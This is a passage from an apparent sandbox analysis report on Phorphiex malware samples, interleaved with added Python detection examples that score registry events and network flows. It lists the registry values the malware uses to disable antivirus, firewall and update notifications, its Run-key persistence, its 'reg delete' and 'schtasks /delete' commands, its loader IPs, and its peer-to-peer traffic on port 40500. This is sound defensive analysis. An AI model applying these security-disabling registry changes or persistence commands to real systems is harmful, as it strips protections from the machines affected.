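# Constructed events mirroring the behavioral9 tables, plus two benign ones.
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": r"C:\Windows\sysfgdrvs.exe",
     "TargetObject": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\sysfgdrvs.exe",
     "TargetObject": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Users\Admin\AppData\Local\Temp\39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3.exe",
     "TargetObject": r"HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings",
     "Details": r"C:\\Windows\\sysfgdrvs.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f'},
    {"EventID": 13, "Image": r"C:\Program Files\Vendor\setup.exe",  # benign Run entry (constructed)
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater",
     "Details": '"C:\\Program Files\\Vendor\\updater.exe" /background'},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",  # flag being reset to 0
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusOverride",
     "Details": "DWORD (0x00000000)"},
]

if __name__ == "__main__":
    for rule, image, indicator in evaluate(SAMPLE_EVENTS):
        print(f"{rule:28} {image}  <- {indicator}")
```

On the sample events this yields four findings: two Security Center overrides from sysfgdrvs.exe, one Run value from the original dropper, and the cleanup command from cmd.exe; the vendor Run entry under Program Files and the reset-to-zero write are ignored. Matching on the Security Center path without the Wow6432Node prefix keeps the rule valid for both 32-bit and 64-bit writers.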
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.72.235.82:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| AZ | 94.20.233.197:40500 | N/A | tcp |
| IR | 188.253.71.202:40500 | N/A | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| PK | 116.71.51.244:40500 | N/A | udp |
| PK | 116.71.35.250:40500 | N/A | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| UZ | 217.30.170.108:40500 | N/A | udp |
| AF | 149.54.17.41:40500 | N/A | udp |
| UZ | 89.236.234.110:40500 | N/A | tcp |
| IN | 117.212.117.142:40500 | N/A | udp |
| IR | 95.38.204.182:40500 | N/A | udp |
| UZ | 87.237.237.23:40500 | N/A | udp |
| UZ | 195.158.22.4:40500 | N/A | udp |
| RU | 46.0.146.193:40500 | N/A | udp |
| IR | 151.235.44.63:40500 | N/A | udp |
| UZ | 213.230.109.202:40500 | N/A | tcp |
| VE | 201.211.11.217:40500 | N/A | udp |
| IR | 5.238.157.152:40500 | N/A | udp |
| SY | 82.137.239.71:40500 | N/A | udp |
| YE | 134.35.144.6:40500 | N/A | udp |
| IN | 59.97.183.62:40500 | N/A | tcp |
| RU | 84.51.223.35:40500 | N/A | udp |
| IR | 78.38.31.221:40500 | N/A | udp |
| UZ | 213.230.90.43:40500 | N/A | udp |
| IN | 61.0.45.124:40500 | N/A | udp |
| US | 69.67.151.86:40500 | N/A | udp |
| N/A | 10.154.110.250:40500 | N/A | tcp |
| IR | 213.207.220.39:40500 | N/A | udp |
| YE | 46.35.85.37:40500 | N/A | udp |
| IR | 31.59.67.27:40500 | N/A | udp |
| MX | 187.135.208.172:40500 | N/A | udp |
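Besides the repeated plain-HTTP fetches from 185.215.113.84, the table above shows the sample reaching dozens of unrelated addresses on port 40500 over UDP and TCP, the fan-out of the bot's peer-to-peer channel. The following is an added example and is not part of the sandbox report: it scores a constructed flow log on that pattern, flagging sources that contact a listed loader host on TCP/80 and sources that touch many distinct public peers on 40500. The flow-line format, the internal host addresses and the 8-peer threshold are assumptions; the destination addresses are taken from the rows above.

```python
import ipaddress
from collections import defaultdict

# Loader hosts the dropped binaries fetch from over plain HTTP in the network
# tables on this page; the peer port comes from the same tables.
C2_HOSTS = frozenset({"185.215.113.84", "185.215.113.66"})
P2P_PORT = 40500


def parse_flows(text):
    """Parse constructed 'src,dst:port,proto' lines into (src, dst, dport, proto)."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        src, dst, proto = (part.strip() for part in line.split(","))
        host, _, port = dst.rpartition(":")
        flows.append((src, host, int(port), proto.lower()))
    return flows


def p2p_fanout(flows, port=P2P_PORT, min_peers=8):
    """Distinct public peers each source reached on `port`; only sources at or
    above `min_peers` are returned (the threshold is an assumption to tune)."""
    peers = defaultdict(set)
    for src, host, dport, _proto in flows:
        if dport != port:
            continue
        addr = ipaddress.ip_address(host)
        if addr.is_private or addr.is_loopback:
            continue  # the 10.x peer in the report is not Internet fan-out
        peers[src].add(host)
    return {src: sorted(p) for src, p in peers.items() if len(p) >= min_peers}


def c2_contacts(flows, c2_hosts=C2_HOSTS):
    """Sources that spoke to a listed loader host on TCP/80."""
    return sorted({src for src, host, dport, proto in flows
                   if host in c2_hosts and dport == 80 and proto == "tcp"})


def triage(flows):
    """Per source: whether it reached a loader host and how many 40500 peers it touched."""
    fan = p2p_fanout(flows)
    c2 = set(c2_contacts(flows))
    return {src: {"c2": src in c2, "peers": len(fan.get(src, []))}
            for src in set(fan) | c2}


# Constructed flow log: 10.0.0.23 replays the behavioral9 connections,
# 10.0.0.50 is a clean host, 10.0.0.77 touches only a few peers.
SAMPLE_FLOWS = """
10.0.0.23,8.8.8.8:53,udp
10.0.0.23,20.72.235.82:80,tcp
10.0.0.23,185.215.113.84:80,tcp
10.0.0.23,185.215.113.84:80,tcp
10.0.0.23,94.20.233.197:40500,tcp
10.0.0.23,188.253.71.202:40500,udp
10.0.0.23,116.71.51.244:40500,udp
10.0.0.23,116.71.35.250:40500,udp
10.0.0.23,217.30.170.108:40500,udp
10.0.0.23,149.54.17.41:40500,udp
10.0.0.23,89.236.234.110:40500,tcp
10.0.0.23,117.212.117.142:40500,udp
10.0.0.23,95.38.204.182:40500,udp
10.0.0.23,87.237.237.23:40500,udp
10.0.0.23,195.158.22.4:40500,udp
10.0.0.23,46.0.146.193:40500,udp
10.0.0.23,10.154.110.250:40500,tcp
10.0.0.50,8.8.8.8:53,udp
10.0.0.50,204.79.197.200:443,tcp
10.0.0.77,151.235.44.63:40500,udp
10.0.0.77,213.230.109.202:40500,tcp
10.0.0.77,201.211.11.217:40500,udp
"""

if __name__ == "__main__":
    for src, verdict in sorted(triage(parse_flows(SAMPLE_FLOWS)).items()):
        print(src, verdict)
```

Only 10.0.0.23 is reported: it reached a loader host and twelve distinct public peers on 40500, while the private 10.154.110.250 peer is not counted. The fan-out check alone would also pick up 10.0.0.77 at a lower threshold, which is why the loader contact is kept as a separate, higher-confidence signal rather than folded into one score.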
Files
memory/948-54-0x0000000074AB1000-0x0000000074AB3000-memory.dmp
memory/1488-55-0x0000000000000000-mapping.dmp
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
C:\Windows\sysfgdrvs.exe
| MD5 | 5db9a00364b3c87e0bc4c52d3fbda13d |
| SHA1 | f2e1f784019db62dd2866295499650a2a7d629dd |
| SHA256 | 39c853575cbe6aa8343e8616cfc22c2dfdad567f78b5aee8e65f38423ebe10e3 |
| SHA512 | 7b472c384b011b24c8d4b0c7b67cc08f9708fee30bcbc38c93188064d1795ba581177cfbdd2f03d5a6f07c7ea4251c934f67710ade09ab04e9cb3884db94ef70 |
\Users\Admin\AppData\Local\Temp\1656221913.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1540-60-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\1656221913.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1540-63-0x000000013F870000-0x000000013F876000-memory.dmp
memory/1540-64-0x000007FEFB6D1000-0x000007FEFB6D3000-memory.dmp
memory/1152-65-0x0000000000000000-mapping.dmp
memory/1316-66-0x0000000000000000-mapping.dmp
memory/1700-67-0x0000000000000000-mapping.dmp
memory/1752-68-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\207527470.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
C:\Users\Admin\AppData\Local\Temp\207527470.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/760-70-0x0000000000000000-mapping.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
151s
Max time network
101s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\34748149.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\222168598.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
| N/A | N/A | C:\Windows\winuedrvs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\winuedrvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\winuedrvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\winuedrvs.exe" | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
| File opened for modification | C:\Windows\winuedrvs.exe | C:\Users\Admin\AppData\Local\Temp\155217673.scr | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\34748149.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\34748149.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe
"C:\Users\Admin\AppData\Local\Temp\a8d0ac5762f61683d7cbcbfc53e0b650e632625d7ffabf08b45986908891ee96.exe"
C:\Users\Admin\AppData\Local\Temp\155217673.scr
C:\Users\Admin\AppData\Local\Temp\155217673.scr
C:\Windows\winuedrvs.exe
C:\Windows\winuedrvs.exe
C:\Users\Admin\AppData\Local\Temp\34748149.exe
C:\Users\Admin\AppData\Local\Temp\34748149.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\222168598.exe
C:\Users\Admin\AppData\Local\Temp\222168598.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| IR | 5.235.133.50:40500 | N/A | udp |
| YE | 213.246.12.16:40500 | N/A | tcp |
| IR | 5.237.216.111:40500 | N/A | udp |
Files
memory/1416-54-0x0000000075E81000-0x0000000075E83000-memory.dmp
\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/304-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
C:\Users\Admin\AppData\Local\Temp\155217673.scr
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
memory/1068-61-0x0000000000000000-mapping.dmp
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
C:\Windows\winuedrvs.exe
| MD5 | 96de9c78028eaec7cd06d8e3e755ffc4 |
| SHA1 | 612d1261bce41723b0a981c92bf9f186c9d46fe2 |
| SHA256 | d560cfb59c61c87d0d4b33aecc98b74c58475c6dd8a3cf6f3bcff2ee05d4c45f |
| SHA512 | 5906efdbf22af2ca3dc9f75accb4bb1f50ad0ddd792a14f5f891975a8e2b5632ce9e7e0e987b216851fef66a4e9bf9c03d847631093382dae79d0d132a41264f |
\Users\Admin\AppData\Local\Temp\34748149.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1940-66-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\34748149.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
C:\Users\Admin\AppData\Local\Temp\34748149.exe
| MD5 | 66bbb99fb92a3688d31a899992f73cdf |
| SHA1 | 836fad08d9de8ea28c35d1885496af8e1284a6e7 |
| SHA256 | 1d6be0622c56551a30c4bf5560050b226ff0f30dc2c05c5496e389efe51c62b6 |
| SHA512 | 6a710765a53d68f1ab91b460dc16b59e273b1ddab43df01886d5ffd54d35c06f399038a6bb07b63d59933ed3c190d00ba9b59506cd0cd94fbb6ea0949d92ca36 |
memory/1940-69-0x000000013FAA0000-0x000000013FAA6000-memory.dmp
memory/1940-70-0x000007FEFB9F1000-0x000007FEFB9F3000-memory.dmp
memory/1724-71-0x0000000000000000-mapping.dmp
memory/1900-72-0x0000000000000000-mapping.dmp
memory/436-73-0x0000000000000000-mapping.dmp
memory/796-74-0x0000000000000000-mapping.dmp
\Users\Admin\AppData\Local\Temp\222168598.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
memory/1600-76-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\222168598.exe
| MD5 | f99a026691957a1490c606890021a4db |
| SHA1 | 4eca65b16ce9b8284f3fc54344f8ae15b406b4e1 |
| SHA256 | db23276681cfb7d843bfc35b96e40dcb77b3bafcb87aa211d3fa6910da6937bd |
| SHA512 | e4d9f869e4c12667a91af5792213350b9205a6fd3a2175e3af39571f2066ffa6a4b398a010497f428310b91033b4d5555835ede6669793f5cfd79ae47321421f |
Analysis: behavioral17
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win7-20220812-en
Max time kernel
151s
Max time network
151s
Command Line
Signatures
Phorphiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\287145087.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1349823367.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
| N/A | N/A | C:\Windows\wklopsvcs.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\wklopsvcs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\wklopsvcs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\wklopsvcs.exe" | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
| File opened for modification | C:\Windows\wklopsvcs.exe | C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\287145087.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\287145087.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe
"C:\Users\Admin\AppData\Local\Temp\c86e66ff929bb7b66fa3a3dcbf12b2a39041ec1740cd5f748d4672bf06d6db5d.exe"
C:\Windows\wklopsvcs.exe
C:\Windows\wklopsvcs.exe
C:\Users\Admin\AppData\Local\Temp\287145087.exe
C:\Users\Admin\AppData\Local\Temp\287145087.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "User Configuration"
C:\Users\Admin\AppData\Local\Temp\1349823367.exe
C:\Users\Admin\AppData\Local\Temp\1349823367.exe
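The process list shows the sample spawning cmd.exe to run reg delete against HKCU\...\CurrentVersion\Run and schtasks /delete, both targeting an entry named "User Configuration": it removes an existing persistence entry before installing its own ("Windows Settings", above). Names removed this way are a useful hunting pivot, since they point at an earlier variant or a competitor already on the host. The following is an added example, not code from the report or the sandbox, that extracts those names from command lines; the command lines are constructed from the list above (the sample's own path shortened to dropper.exe) and the helper names are this example's own:

```python
"""Added example: find the persistence entries a sample removes before it
installs its own.  Not code from the report or the sandbox."""
import re
from collections import defaultdict

# Constructed from the 'Processes' list: the cmd.exe wrappers and the reg.exe /
# schtasks.exe children they spawned (the sample's own path shortened).
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\dropper.exe"',
    r'"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f',
    r'"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "User Configuration"',
    r'reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "User Configuration" /f',
    r'schtasks /delete /f /tn "User Configuration"',
]


def win_argv(cmdline: str) -> list[str]:
    """Minimal Windows-style split: whitespace separates, double quotes group,
    no escape handling (enough for reg.exe / schtasks.exe invocations)."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def _after(argv, low, switch, start):
    """Argument following `switch` (matched case-insensitively) at or after
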